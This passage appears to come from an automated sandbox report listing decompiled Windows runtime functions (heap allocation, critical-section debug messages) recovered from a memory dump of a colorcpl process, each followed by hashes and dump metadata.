                                                                                                				}
                                                                                                				 *_t16 = _t15;
                                                                                                				_t17 =  &(_t16[2]);
                                                                                                				E06E5FA60(_t17, 0, _t15 << 2);
                                                                                                				return _t17;
                                                                                                			}








                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1724768c696e4303f4f310be7e3d524644834df5c4b28ae46fe9c3676c781d46
                                                                                                • Instruction ID: b3f3dd67beaac5aa03b0d68e218ce6c5209588866990be3d491fe247a009a72c
                                                                                                • Opcode Fuzzy Hash: 1724768c696e4303f4f310be7e3d524644834df5c4b28ae46fe9c3676c781d46
                                                                                                • Instruction Fuzzy Hash: 3BE09272A41521ABE3A16E28BC00FAA739DEBD4651F0A5035E904C7254DA28DD02C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E06E1F358(void* __ecx, signed int __edx) {
                                                                                                				char _v8;
                                                                                                				signed int _t9;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t9 = 2;
                                                                                                				_t20 = 0;
                                                                                                				if(E06E4F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                                					_t20 = L06E34620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                				}
                                                                                                				return _t20;
                                                                                                			}







                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction ID: e1e0f62b4135864d7878f2b25a558af9020444dcbadad0398f750893759b3106
                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction Fuzzy Hash: C1E0D832A40218FBCBA1AAD99D09F5ABBECDB44A60F001295B904DB150D5709D40D2D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2FF60(intOrPtr _a4) {
                                                                                                				void* __ecx;
                                                                                                				void* __ebp;
                                                                                                				void* _t13;
                                                                                                				intOrPtr _t14;
                                                                                                				void* _t15;
                                                                                                				void* _t16;
                                                                                                				void* _t17;
                                                                                                
                                                                                                				_t14 = _a4;
                                                                                                				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x6df11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                					return E06EE88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                                                				} else {
                                                                                                					return E06E30050(_t14);
                                                                                                				}
                                                                                                			}











                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f30ac1389c3680f814742f83ff549b17fe5c6e7c48b3969713f5c885e7f029cd
                                                                                                • Instruction ID: 66a8837acf9d0a8c0bf3ab55045e00fd8d1242effc4367d7d5e17d5e5af2466a
                                                                                                • Opcode Fuzzy Hash: f30ac1389c3680f814742f83ff549b17fe5c6e7c48b3969713f5c885e7f029cd
                                                                                                • Instruction Fuzzy Hash: 8EE0DFB0A59315DFF7B4DB51D560F2737BFBB52629F2AA41EE8084B101C621D880C64A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06ECD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                				void* _t5;
                                                                                                
                                                                                                				if(_a4 != 0) {
                                                                                                					_t5 = L06E1E8B0(__ecx, _a4, 0xfff);
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                					return _t5;
                                                                                                				}
                                                                                                				return 0xc000000d;
                                                                                                			}





                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction ID: c4c9848ec0a5e0d28c3a1b5c0d3664a8ab8f6807fa6ae2ffa5a3cc970d873ab9
                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction Fuzzy Hash: D9E0C231280318BBEB625E48CD04FA9BB1AEF407A1F104035FE085E690C6729C92E6C4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E06EA41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t5;
                                                                                                				void* _t14;
                                                                                                
                                                                                                				_push(8);
                                                                                                				_push(0x6ef08f0);
                                                                                                				_t5 = E06E6D08C(__ebx, __edi, __esi);
                                                                                                				if( *0x6f087ec == 0) {
                                                                                                					E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                                					if( *0x6f087ec == 0) {
                                                                                                						 *0x6f087f0 = 0x6f087ec;
                                                                                                						 *0x6f087ec = 0x6f087ec;
                                                                                                						 *0x6f087e8 = 0x6f087e4;
                                                                                                						 *0x6f087e4 = 0x6f087e4;
                                                                                                					}
                                                                                                					 *(_t14 - 4) = 0xfffffffe;
                                                                                                					_t5 = L06EA4248();
                                                                                                				}
                                                                                                				return E06E6D0D1(_t5);
                                                                                                			}






                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e146a3fccf7c10f4c25a9a15a9125a4eaa220aa4eb8a9bb321ac9d2abbb3e377
                                                                                                • Instruction ID: b48c84328ab6cb4ea587fa315d601def4afc00c84fb694b59c66b1f0c7a1a7ad
                                                                                                • Opcode Fuzzy Hash: e146a3fccf7c10f4c25a9a15a9125a4eaa220aa4eb8a9bb321ac9d2abbb3e377
                                                                                                • Instruction Fuzzy Hash: E1F01C74B60708CFEFE1DF65D90070436EBF748391F406115923087288D7785448CF16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4A185() {
                                                                                                				void* __ecx;
                                                                                                				intOrPtr* _t5;
                                                                                                
                                                                                                				if( *0x6f067e4 >= 0xa) {
                                                                                                					if(_t5 < 0x6f06800 || _t5 >= 0x6f06900) {
                                                                                                						return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                                					} else {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					return E06E30010(0x6f067e0, _t5);
                                                                                                				}
                                                                                                			}






                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08313365c02ba93ec1e86d50ffce37ced4b3a31c8653361f777e47237765a998
                                                                                                • Instruction ID: a6868b432ffa52fbd11434e5f879eb5de7bd99790efc22c66045f7b2a6d8cd7c
                                                                                                • Opcode Fuzzy Hash: 08313365c02ba93ec1e86d50ffce37ced4b3a31c8653361f777e47237765a998
                                                                                                • Instruction Fuzzy Hash: C6D05BA11A12045AF6ED7724AD58B253257EB84720F30581DF1078BAD8DD54C8F8E109
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E416E0(void* __edx, void* __eflags) {
                                                                                                				void* __ecx;
                                                                                                				void* _t3;
                                                                                                
                                                                                                				_t3 = E06E41710(0x6f067e0);
                                                                                                				if(_t3 == 0) {
                                                                                                					_t6 =  *[fs:0x30];
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                                						goto L1;
                                                                                                					} else {
                                                                                                						return L06E34620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					return _t3;
                                                                                                				}
                                                                                                			}






                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 19ea167ad07747dda89a2a273df5c50402c4907755541ee22379c5bb6733e4a8
                                                                                                • Instruction ID: f329288aa2a4fe01633d9874eea50f87e77e5a832ab6d39b843473186b36848c
                                                                                                • Opcode Fuzzy Hash: 19ea167ad07747dda89a2a273df5c50402c4907755541ee22379c5bb6733e4a8
                                                                                                • Instruction Fuzzy Hash: 81D0A73111034092DEAD6F24AC08B642256DB80785F38109CF117494C0CFB4DCE2E448
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E953CA(void* __ebx) {
                                                                                                				intOrPtr _t7;
                                                                                                				void* _t13;
                                                                                                				void* _t14;
                                                                                                				intOrPtr _t15;
                                                                                                				void* _t16;
                                                                                                
                                                                                                				_t13 = __ebx;
                                                                                                				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                                                					E06E2EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                                                					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                                                				}
                                                                                                				if(_t15 != 0) {
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                                                					return  *((intOrPtr*)(_t16 - 0x64));
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}









                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction ID: 045f17f8baad3c15078d17c0ca59665a1a5521a86f5b08701358f1d4df10fb57
                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction Fuzzy Hash: F1E08C729007849BCF93EB58CA54F4EB7F9FF44B00F140004A4085B660C624AC00CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E435A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                                				void* _t6;
                                                                                                				void* _t10;
                                                                                                				void* _t11;
                                                                                                
                                                                                                				_t10 = __ecx;
                                                                                                				_t6 = __eax;
                                                                                                				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                                					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                                				}
                                                                                                				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                                					return E06E2EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                				}
                                                                                                				return _t6;
                                                                                                			}







                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2AAB0() {
                                                                                                				intOrPtr* _t4;
                                                                                                
                                                                                                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                				if(_t4 != 0) {
                                                                                                					if( *_t4 == 0) {
                                                                                                						goto L1;
                                                                                                					} else {
                                                                                                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					return 0x7ffe0030;
                                                                                                				}
                                                                                                			}




                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E9A537(intOrPtr _a4, intOrPtr _a8) {
                                                                                                
                                                                                                				return L06E38E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                                			}



                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1DB40() {
                                                                                                				signed int* _t3;
                                                                                                				void* _t5;
                                                                                                
                                                                                                				_t3 = L06E34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                                				if(_t3 == 0) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					 *_t3 =  *_t3 | 0x00000400;
                                                                                                					return _t3;
                                                                                                				}
                                                                                                			}





                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E276E2(void* __ecx) {
                                                                                                				void* _t5;
                                                                                                
                                                                                                				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                                					return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                				}
                                                                                                				return _t5;
                                                                                                			}




                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E436CC(void* __ecx) {
                                                                                                
                                                                                                				if(__ecx > 0x7fffffff) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					return L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                				}
                                                                                                			}



                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1AD30(intOrPtr _a4) {
                                                                                                
                                                                                                				return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                			}



                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E33A1C(intOrPtr _a4) {
                                                                                                				void* _t5;
                                                                                                
                                                                                                				return L06E34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                			}




                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E37D50() {
                                                                                                				intOrPtr* _t3;
                                                                                                
                                                                                                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                				if(_t3 != 0) {
                                                                                                					return  *_t3;
                                                                                                				} else {
                                                                                                					return _t3;
                                                                                                				}
                                                                                                			}




                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E42ACB() {
                                                                                                				void* _t5;
                                                                                                
                                                                                                				return E06E2EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                			}





                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction ID: 1290e4339d0b79c90c895b545517be9e3d667e65668cbac86bfc457d59e33aef
                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction Fuzzy Hash: 75B01233C10661CFCF92EF40CA10B197336FB00750F054490901127930C228AC01CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E06EAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                				void* _t7;
                                                                                                				intOrPtr _t9;
                                                                                                				intOrPtr _t10;
                                                                                                				intOrPtr* _t12;
                                                                                                				intOrPtr* _t13;
                                                                                                				intOrPtr _t14;
                                                                                                				intOrPtr* _t15;
                                                                                                
                                                                                                				_t13 = __edx;
                                                                                                				_push(_a4);
                                                                                                				_t14 =  *[fs:0x18];
                                                                                                				_t15 = _t12;
                                                                                                				_t7 = E06E5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                				_push(_t13);
                                                                                                				E06EA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                				_t9 =  *_t15;
                                                                                                				if(_t9 == 0xffffffff) {
                                                                                                					_t10 = 0;
                                                                                                				} else {
                                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                				}
                                                                                                				_push(_t10);
                                                                                                				_push(_t15);
                                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                				return E06EA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                			}











                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06EAFDFA
                                                                                                Strings
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 06EAFE2B
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 06EAFE01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                • API String ID: 885266447-3903918235
                                                                                                • Opcode ID: 5e11c4529f1bc242e3d71118827fadcc4aa9fd10f76f055d0ea492d07ba6cf86
                                                                                                • Instruction ID: 29f437db9d5fe8f29ce78d83dbab33ab3a627c13fd0ed7d934ff27e27e777b12
                                                                                                • Opcode Fuzzy Hash: 5e11c4529f1bc242e3d71118827fadcc4aa9fd10f76f055d0ea492d07ba6cf86
                                                                                                • Instruction Fuzzy Hash: 87F0F632600301BFEAA01A45DC06F33BF5EEB44730F245315F6285A1D1EAA2F960C6F4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%